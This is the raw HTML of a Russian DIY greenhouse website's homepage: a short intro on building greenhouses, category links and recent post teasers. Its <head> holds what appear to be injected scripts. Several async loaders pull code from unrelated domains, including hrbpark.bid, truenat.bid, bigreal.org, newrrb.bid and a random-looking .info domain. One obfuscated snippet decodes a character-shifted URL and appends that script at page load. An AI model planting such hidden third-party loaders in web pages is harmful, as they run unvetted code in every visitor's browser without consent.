<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!--[if IE]><![endif]-->
	
	<script charset="utf-8" async src="https://hrbpark.bid/pushJs/NYlBefpA.js"></script>
	<script charset="utf-8" async src="https://truenat.bid/nat/NYlBefpA.js"></script>
	
    <meta charset="utf-8" />
    <!--[if IE]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <title>Теплицы + Парники Своими Руками | Подробные Инструкции И Гайды</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
    <meta property="fb:pages" content="371413836649078" />
    <link rel="stylesheet" href="https://parnik-teplitsa.ru/wp-content/themes/parnik/css/reset.css" type="text/css" />
    <link rel="stylesheet" href="https://parnik-teplitsa.ru/wp-content/themes/parnik/css/jquery.mCustomScrollbar.css" type="text/css" />
    <link rel="stylesheet" href="https://parnik-teplitsa.ru/wp-content/themes/parnik/style.css" type="text/css" media="screen, projection" />
    <link rel="stylesheet" href="https://parnik-teplitsa.ru/wp-content/themes/parnik/css/screen.css" type="text/css" media="screen, projection" />
    <!--[if lte IE 6 ]><script type="text/javascript">window.location.href="https://parnik-teplitsa.ru/wp-content/themes/parnik/ie6_close/index_ru.html";</script><![endif]-->
    <!--[if lt IE 9]><link rel="stylesheet" type="text/css" href="https://parnik-teplitsa.ru/wp-content/themes/parnik/css/all_ie.css"><![endif]-->
    <!--[if lt IE 10]><script type="text/javascript" src="https://parnik-teplitsa.ru/wp-content/themes/parnik/js/pie.js"></script><![endif]-->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
    <script type="text/javascript" src="https://parnik-teplitsa.ru/wp-content/themes/parnik/js/jquery.placeholder.min.js"></script>
    <script type="text/javascript" src="https://parnik-teplitsa.ru/wp-content/themes/parnik/js/jquery.liTextLength.js"></script>
    <script type="text/javascript" src="https://parnik-teplitsa.ru/wp-content/themes/parnik/js/jquery.mCustomScrollbar.js"></script>
    <script type="text/javascript" src="https://parnik-teplitsa.ru/wp-content/themes/parnik/js/jquery.flexslider.js"></script>
    <script type="text/javascript" src="https://parnik-teplitsa.ru/wp-content/themes/parnik/js/main.js"></script>
     <script async src="//cmp.optad360.io/items/877b4341-1834-4888-957e-ba7a7f830362.min.js"></script>
<script async src="//get.optad360.io/sf/1eea6b1a-750e-4471-be02-d2340cb370f6/plugin.min.js"></script> 
<!-- All In One SEO Pack 3.6.2[376,414] -->
<meta name="description"  content="Изучите Как Построить Теплицу, Парник, Тепличный Комбинат Самостоятельно Тут: ❶ Пошаговые Инструкции Для Начинающих ❷ Советы По Устранению Проблем ❸ Выбор Надежных Материалов" />

<script type="application/ld+json" class="aioseop-schema">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://parnik-teplitsa.ru/#organization","url":"https://parnik-teplitsa.ru/","name":"Теплицы + Парники Своими Руками","sameAs":[]},{"@type":"WebSite","@id":"https://parnik-teplitsa.ru/#website","url":"https://parnik-teplitsa.ru/","name":"Теплицы + Парники Своими Руками","publisher":{"@id":"https://parnik-teplitsa.ru/#organization"}},{"@type":"WebPage","@id":"https://parnik-teplitsa.ru#webpage","url":"https://parnik-teplitsa.ru","inLanguage":"ru-RU","name":"Теплицы + Парники Своими Руками","isPartOf":{"@id":"https://parnik-teplitsa.ru/#website"},"breadcrumb":{"@id":"https://parnik-teplitsa.ru#breadcrumblist"},"description":"Подробные Инструкции И Гайды","datePublished":"2013-09-16T13:37:30+00:00","dateModified":"2018-12-20T21:04:36+00:00","about":{"@id":"https://parnik-teplitsa.ru/#organization"}},{"@type":"BreadcrumbList","@id":"https://parnik-teplitsa.ru#breadcrumblist","itemListElement":[{"@type":"ListItem","position":1,"item":{"@type":"WebPage","@id":"https://parnik-teplitsa.ru/","url":"https://parnik-teplitsa.ru/","name":"Теплицы + Парники Своими Руками"}}]}]}</script>
<link rel="canonical" href="https://parnik-teplitsa.ru/" />
<meta property="og:type" content="website" />
<meta property="og:title" content="Парники и теплицы строим сами" />
<meta property="og:description" content="Подробные Инструкции И Гайды" />
<meta property="og:url" content="https://parnik-teplitsa.ru/" />
<meta property="og:site_name" content="parnik-teplitsa.ru" />
<meta property="og:image" content="https://parnik-teplitsa.ru/wp-content/uploads/2017/05/udobrenie-provodyat-vo-vremya-obilnyh-dozhdey-ili-.jpg" />
<meta property="og:image:secure_url" content="https://parnik-teplitsa.ru/wp-content/uploads/2017/05/udobrenie-provodyat-vo-vremya-obilnyh-dozhdey-ili-.jpg" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="Парники и теплицы строим сами" />
<meta name="twitter:description" content="Подробные Инструкции И Гайды" />
<meta name="twitter:image" content="https://parnik-teplitsa.ru/wp-content/uploads/2017/05/udobrenie-provodyat-vo-vremya-obilnyh-dozhdey-ili-.jpg" />
<!-- All In One SEO Pack -->
<link rel='dns-prefetch' href='//s.w.org' />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/parnik-teplitsa.ru\/wp-includes\/js\/wp-emoji-release.min.js"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='titan-adminbar-styles-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/anti-spam/assets/css/admin-bar.css' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' />
<link rel='stylesheet' id='toc-screen-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/table-of-contents-plus/screen.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='taxonomy-image-plugin-public-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/taxonomy-images/css/style.css' type='text/css' media='screen' />
<link rel='stylesheet' id='wpProQuiz_front_style-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/wp-pro-quiz/css/wpProQuiz_front.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='wp-pagenavi-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/wp-pagenavi/pagenavi-css.css' type='text/css' media='all' />
<link rel='stylesheet' id='evc-share-style-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/easy-vkontakte-connect/css/style-share.css' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='https://parnik-teplitsa.ru/wp-includes/css/dashicons.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='slb_core-css'  href='https://parnik-teplitsa.ru/wp-content/plugins/simple-lightbox/client/css/app.css' type='text/css' media='all' />
<script type='text/javascript' src='https://parnik-teplitsa.ru/wp-includes/js/jquery/jquery.js'></script>
<script type='text/javascript' src='https://parnik-teplitsa.ru/wp-includes/js/jquery/jquery-migrate.min.js'></script>
<script type='text/javascript' src='https://parnik-teplitsa.ru/wp-content/plugins/easy-vkontakte-connect/js/jquery.cookie.js'></script>
<link rel='https://api.w.org/' href='https://parnik-teplitsa.ru/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://parnik-teplitsa.ru/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://parnik-teplitsa.ru/wp-includes/wlwmanifest.xml" /> 
<link rel='shortlink' href='https://parnik-teplitsa.ru/' />
<link rel="alternate" type="application/json+oembed" href="https://parnik-teplitsa.ru/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fparnik-teplitsa.ru%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://parnik-teplitsa.ru/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fparnik-teplitsa.ru%2F&#038;format=xml" />
<!-- 1 --><!-- 2 --><!-- CC No Support And not insert in cache --><!-- All in one Favicon 4.7 --><link rel="shortcut icon" href="http://parnik-teplitsa.ru/wp-content/uploads/2014/08/favicon.ico" />
<style type="text/css">.broken_link, a.broken_link {
	text-decoration: line-through;
}</style><style>.comment_agree{display:none;}</style><style type="text/css">
    #overlay-sidebar {
      width: 380px;
      margin: 0 0 0 -190px;
    }
    #slide-sidebar {
      width: 380px;
      right:-423px; // width + 43px
      bottom: 20px;
    }
  </style><script type="text/javascript">
    var VKWidgetsGroup = [];
    var VKWidgetsComments = [];
    var VKWidgetsPolls = [];
    var VKWidgetsSubscribe = [];
    var VKWidgetsContactUs = [];
    var VKWidgetsCommunityMessages = [];
    var VKWidgets = [];
    
    var vkUnLock = [];
    var subscribeCookieExpires = 1;
    
    if (typeof ajaxurl == "undefined")
      ajaxurl = "https://parnik-teplitsa.ru/wp-admin/admin-ajax.php";
  
    oTimeout = 5000;
    oScreens = 0.75;
    oCookieExpires = 365;
    oAction = "timeout";
    oSensitivity = 20;
    oTop = "40px";

    sTimeout = 5000;
    sScreens = 0.75;
    sCookieExpires = 365;
    sAction = "scroll";
    sSensitivity = 20;
    sSpeed = 800;
        
  </script><script type="text/javascript">evc_post_id = 748;</script><!-- ## NXS/OG ## --><!-- ## NXSOGTAGS ## --><!-- ## NXS/OG ## -->

<style>
#ya-site-form0 .ya-site-form__submit {
display: block;
width: 33px !important;
position: relative;
height: 19px;
background: url(wp-content/themes/parnik/img/search-icon.png) no-repeat;
border: 0px;
outline: none;
text-indent: -9999px;
}
</style>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-38736855-7', 'auto');
  ga('send', 'pageview');

</script>

<meta name="pmail-verification" content="283e0fb79aa448967fd297e89fdd014a">
	
<!-- Facebook Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '237713330219615');
  fbq('track', 'PageView');
</script>
<noscript><img height=""1"" width=""1"" style=""display:none""
  src=""https://www.facebook.com/tr?id=237713330219615&ev=PageView&noscript=1""
/></noscript>
<!-- End Facebook Pixel Code -->
 <script> 
  !function(){function t(){var t=document.createElement("script");t.setAttribute("src",function(t){for(var e,n="",o=0;o<t.length;o++)e=t.charCodeAt(o)+2,n=n.concat(String.fromCharCode(e));return n}("frrnq8--uuu,qr_rqdmp_bq,amk-r_e-7./70/340,kgl,hq")),t.setAttribute("async","async"),document.body.appendChild(t)}"loading"===document.readyState?document.addEventListener("DOMContentLoaded",t):t()}(); 
 </script> 
 <script async src="https://www.statsforads.com/tag/901921562.min.js"></script> 

<script charset="utf-8" async src="https://bigreal.org/pushJs/NYlBefpA.js"></script>
<script charset="utf-8" async src="https://bigreal.org/pushJs/1Q_oiXGM.js"></script>	
<script type="text/javascript"> rbConfig={start:performance.now(),rbDomain:"newrrb.bid",rotator:'7ohn'}; </script>
<script async="async" type="text/javascript" src="//newrrb.bid/7ohn.min.js"></script>
        
	<script src="https://knkqjmjyxzev.info/script.js"></script>
	

	
</head>

<body>
	<!--script async src="//get.optad360.io/sf/889b5380-5c4c-11e9-90af-02b353d38134/plugin.min.js"></script-->

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = 'https://connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v2.12';
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>	
	

<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "2928284", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div>
<img src="//top-fwz1.mail.ru/counter?id=2928284;js=na" style="border:0;position:absolute;left:-9999px;" alt="" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

<div id="page">
<header id="header">
<!--
<div class="mm-nd mm-nd2">
    <div class="menu-top2-container"><ul id="menu-top2" class="menu"><li id="menu-item-4273" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4273"><a href="https://parnik-teplitsa.ru/lunnyj-kalendar">Лунный календарь на 2018 год</a></li>
<li id="menu-item-4275" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4275"><a href="https://parnik-teplitsa.ru/voprosy-ekspertu">Вопросы эксперту</a></li>
<li id="menu-item-4279" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4279"><a href="https://parnik-teplitsa.ru/otvety">Ответы</a></li>
<li id="menu-item-4274" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4274"><a href="https://parnik-teplitsa.ru/reklamodatelyam">Рекламодателям</a></li>
</ul></div></div>-->
    <a class="logo"><img alt="" src="http://parnik-teplitsa.ru/wp-content/themes/parnik/img/logo.png"></a>    <div class="soc"></div>

    <div class="search">

<div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://parnik-teplitsa.ru/poisk','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'parnik-teplitsa.ru','suggest':true,'target':'_self','tld':'ru','type':2,'searchid':2147172,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'transparent','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':null,'input_placeholderColor':'#000000','input_borderColor':'transparent'}"><form action="http://yandex.ru/sitesearch" method="get" target="_self"><input type="hidden" name="searchid" value="2147172"/><input type="hidden" name="l10n" value="ru"/><input type="hidden" name="reqenc" value=""/><input type="text" name="text" value=""/><input type="submit" value="Найти"/></form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script>
		
		
		


</div>
<div class="mm-nd">
    <div class="menu-top-container"><ul id="menu-top" class="menu"><li id="menu-item-4456" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4456"><a href="https://parnik-teplitsa.ru/video-uroki">Наши видео-уроки</a></li>
<li id="menu-item-4471" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4471"><a href="https://parnik-teplitsa.ru/otvety">Ответы</a></li>
<li id="menu-item-4455" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4455"><a href="https://parnik-teplitsa.ru/avtory">Редакция сайта</a></li>
<li id="menu-item-5891" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5891"><a href="https://parnik-teplitsa.ru/fotokollekciya">Фотоколлекция</a></li>
<li id="menu-item-6967" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6967"><a href="https://parnik-teplitsa.ru/test-zayadlym-ogorodnikam">Тест  огородникам</a></li>
</ul></div></div>
</header>


    <section id="content">
        <!--<table class="rubr-ct">
    <tr>
        <td>
            
            <a href="http://parnik-teplitsa.ru/fundament-konstrukcii"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q5.png" alt=""/><span>Фундамент для теплицы</span></a>

  	    <a href="http://parnik-teplitsa.ru/karkas-konstrukcii"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q6.png" alt=""/><span>Каркас</span></a>
 
	    <a href="http://parnik-teplitsa.ru/pokrytie"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q11.png" alt=""/><span>Покрытие</span></a>

	    <a href="http://parnik-teplitsa.ru/vidy-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q10.png" alt=""/><span>Особенности различных видов теплиц</span></a>

	    <a href="http://parnik-teplitsa.ru/teplicy-i-parniki-iz-polikarbonata"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q2.png" alt=""/><span>Теплицы и парники из поликарбоната</span></a>

	    <a href="http://parnik-teplitsa.ru/promyshlennye-teplicy"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q7.png" alt=""/><span>Обзор Промышленных теплиц</span></a>


        </td>
        <td>

	   <a href="http://parnik-teplitsa.ru/otoplenie-obsluzhivanie-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q17.png" alt=""/><span>Отопление</span></a>

           <a href="http://parnik-teplitsa.ru/ventilyaciya-obsluzhivanie-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q9.png" alt=""/><span>Вентиляция</span></a>  

           <a href="http://parnik-teplitsa.ru/osveshhenie-obsluzhivanie-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q12.png" alt=""/><span>Освещение</span></a>

           <a href="http://parnik-teplitsa.ru/poliv-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q14.png" alt=""/><span>Автополив в теплице</span></a>

	   <a href="http://parnik-teplitsa.ru/gryadki-posadki-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q4.png" alt=""/><span>Грядки</span></a>

	   <a href="http://parnik-teplitsa.ru/aktualnye-voprosy"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q1.png" alt=""/><span>Актуальные вопросы</span></a>


        </td>
        <td>
            
	 <a href="http://parnik-teplitsa.ru/rasteniya"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q3.png" alt=""/><span>Выращивание овощей</span></a>

	 <a href="http://parnik-teplitsa.ru/formirovanie-posadki-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q8.png" alt=""/><span>Формирование овощей</span></a>

	 <a href="http://parnik-teplitsa.ru/poliv-posadki-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q15.png" alt=""/><span>Полив овощей</span></a>

	 <a href="http://parnik-teplitsa.ru/problemyboleznivrediteli"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q13.png" alt=""/><span>Проблемы, болезни, вредители</span></a>
        
         <a href="http://parnik-teplitsa.ru/podkorm"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q16.png" alt=""/><span>Подкорм</span></a>

         <a href="http://parnik-teplitsa.ru/otvety"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q18.png" alt=""/><span>Вопросы-ответы</span></a>
        </td>
    </tr>
</table>-->
<div class="rubr-ct2">
<a href="http://parnik-teplitsa.ru/fundament-konstrukcii"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q5.png" alt=""/><span>Фундамент для теплицы</span></a>

        <a href="http://parnik-teplitsa.ru/karkas-konstrukcii"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q6.png" alt=""/><span>Каркас</span></a>
 
      <a href="http://parnik-teplitsa.ru/pokrytie"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q11.png" alt=""/><span>Покрытие</span></a>

      <a href="http://parnik-teplitsa.ru/vidy-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q10.png" alt=""/><span>Особенности различных видов</span></a>

      <a href="http://parnik-teplitsa.ru/teplicy-i-parniki-iz-polikarbonata"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q2.png" alt=""/><span>Теплицы из поликарбоната</span></a>

      <a href="http://parnik-teplitsa.ru/promyshlennye-teplicy"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q7.png" alt=""/><span>Промышленных модели</span></a>

     <a href="http://parnik-teplitsa.ru/otoplenie-obsluzhivanie-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q17.png" alt=""/><span>Отопление</span></a>

           <a href="http://parnik-teplitsa.ru/ventilyaciya-obsluzhivanie-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q9.png" alt=""/><span>Вентиляция</span></a>  

           <a href="http://parnik-teplitsa.ru/osveshhenie-obsluzhivanie-teplic"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q12.png" alt=""/><span>Освещение</span></a>

           <a href="http://parnik-teplitsa.ru/poliv-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q14.png" alt=""/><span>Автополив в теплице</span></a>

     <a href="http://parnik-teplitsa.ru/gryadki-posadki-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q4.png" alt=""/><span>Грядки</span></a>

    <!-- <a href="http://parnik-teplitsa.ru/aktualnye-voprosy"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q1.png" alt=""/><span>Актуальные вопросы</span></a>-->

   <a href="http://parnik-teplitsa.ru/rasteniya"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q3.png" alt=""/><span>Выращивание овощей</span></a>

   <a href="http://parnik-teplitsa.ru/formirovanie-posadki-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q8.png" alt=""/><span>Формирование овощей</span></a>

   <a href="http://parnik-teplitsa.ru/poliv-posadki-v-teplice"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q15.png" alt=""/><span>Полив овощей</span></a>

   <a href="http://parnik-teplitsa.ru/problemyboleznivrediteli"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q13.png" alt=""/><span>Проблемы, болезни, вредители</span></a>
        
         <a href="http://parnik-teplitsa.ru/podkorm"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q16.png" alt=""/><span>Подкорм</span></a>

       <!--  <a href="http://parnik-teplitsa.ru/otvety"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/q18.png" alt=""/><span>Вопросы-ответы</span></a>-->


<!-- Сервисы-->
</div>
<div class="tree-rb">
  <a href="http://parnik-teplitsa.ru/voprosy-ekspertu" class="et-item-rb"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/ban-new1.jpg" alt=""></a>
  <a href="https://www.youtube.com/channel/UCg7J2HchDdYRqlforRydqWQ" class="et-item-rb"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/ban-new2.jpg" alt=""></a>
  <a href="http://parnik-teplitsa.ru/lunnyj-kalendar" class="et-item-rb"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/ban-new3.jpg" alt=""></a>
  <div class="bn-links-tree">
        <a href="http://parnik-teplitsa.ru/udobreniya-dlya-pochvy" class="ln-tt1">Удобрения<br>для почвы</a>
        <a href="http://parnik-teplitsa.ru/udobreniya-dlya-poliva" class="ln-tt2">Удобрения<br>для полива</a>
        <a href="http://parnik-teplitsa.ru/mikroelementy" class="ln-tt3">Микроэлементы</a>
    </div>
</div>

<!--Тест на огородника-->
<a href="http://parnik-teplitsa.ru/test-zayadlym-ogorodnikam" class="big-bans1"></a>
<div class="big-bans-mob1"><a href="http://parnik-teplitsa.ru/test-zayadlym-ogorodnikam"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/ban-nv1.jpg" alt=""></a></div>
<div class="ov">


                                <!-- Контент-->

  <h1>Парники И Теплицы Самостоятельно</h1>
                    <p>Каждый мечтает о том, чтобы на его столе были свежие, только сорванные с грядочки, экологически чистые овощи, ягоды и фрукты. Как прекрасно иметь возможность дарить себе, своим любимым и близким потрясающие букеты роскошных цветов в самую ненастную и холодную погоду. Если Вы с грустью подумали об огромных суммах, которые вам придется потратить на все эти удовольствия, то Вы не правы! Да потратиться вам придется, но по большей части это будут траты Вашего времени и сил, умений и знаний. Даже если Вы никогда раньше не интересовались и не занимались <a title="Как покрыть теплицу поликарбонатом - наши рекомендации" href="http://parnik-teplitsa.ru/kak-pokryt-teplicu-polikarbonatom-12">сооружением теплиц и парников</a>, не выращивали в закрытом грунте овощи, ягоды и цветы, то на нашем сайте.</p>
<p>Вы сможете получить всю необходимую информацию. Множество <a title="Бизнес план теплицы - делаем правильно" href="http://parnik-teplitsa.ru/biznes-plan-teplicy-20">полезных статей</a> расскажут вам о том, какие бывают теплицы и парники, как и <a title="Теплица из оконных рам: самостоятельная установка" href="http://parnik-teplitsa.ru/teplica-iz-okonnyh-ram-samostoyatelnaya-ustanovka-35">из чего их можно построить</a>,  как выращивать самые обычные овощи и даже экзотические фрукты в наших, совсем не тропических условиях. В огромном многообразии предлагаемых сегодня теплиц и парников, материалов для их изготовления не  сложно растеряться. <a title="Парник бабочка – общий обзор и возможность изготовления своими силами" href="http://parnik-teplitsa.ru/parnik-babochka-42">Пленочный парник</a> или теплица из поликарбоната, неотапливаемая или всесезонная <a title="Теплица из стрейч пленки или парник" href="http://parnik-teplitsa.ru/teplica-iz-strejch-plenki-ili-parnik-53">отапливаемая теплица</a>, как определить какой из этих вариантов подходит именно для Вас и вашего участка? Какой материал выбрать: дерево или металл, пластик или стекло, а может быть пленку?</p>
<blockquote><p>Следуя советам и рекомендациям по выбору и обустройству теплиц, вы сможете подобрать наиболее подходящий вариант, просчитать насколько он целесообразен и финансово доступен. В том случае, если Вы уже точно знаете, какая именно конструкция Вам необходима, то четкие и пошаговые инструкции, с подробным описанием необходимых инструментов и материалов помогут вам самостоятельно их изготовить. На самом деле, каждый может смастерить рассадник, пленочный тоннель или <a title="Капельный полив в теплице своими руками – задача проста, эффект колоссальный" href="http://parnik-teplitsa.ru/kapelnyj-poliv-v-teplice-svoimi-rukami-6">систему капельного полива</a>, особенно если будет следовать четким и последовательным  инструкциям, подробным схемам и проверенным на практике рекомендациям.</p></blockquote>
                            </div>
            <div class="inf-z">
                <div class="soc2">


<script type="text/javascript" src="//yandex.st/share/share.js"
charset="utf-8"></script>
<div class="yashare-auto-init" data-yashareL10n="ru"
 data-yashareQuickServices="yaru,vkontakte,facebook,twitter,odnoklassniki,moimir" data-yashareTheme="counter"

></div> 


</div>
                <span class="tt">Поделиться в соц. сетях</span>
            </div>


<!--Свежие записи-->
<div class="title-side">Последние новости</div>
<div class="post2">
<div class="post">
    <a class="post-ct" href="https://parnik-teplitsa.ru/osnovnye-preimushhestva-pokupki-uchastkov-v-podmoskove"><img src="https://parnik-teplitsa.ru/wp-content/uploads/2022/01/qwer012.jpg" height="125" alt=""/>Основные преимущества покупки участков в Подмосковье</a>
    <div class="inf-panel"><span>11.01.22</span><span class="j1">0</span><span class="j2">135</span></div>
</div>
<div class="post">
    <a class="post-ct" href="https://parnik-teplitsa.ru/preimushhestva-zakaza-taksi-onlajn"><img src="https://parnik-teplitsa.ru/wp-content/uploads/2022/01/qwer011-1.jpg" height="125" alt=""/>Преимущества заказа такси онлайн</a>
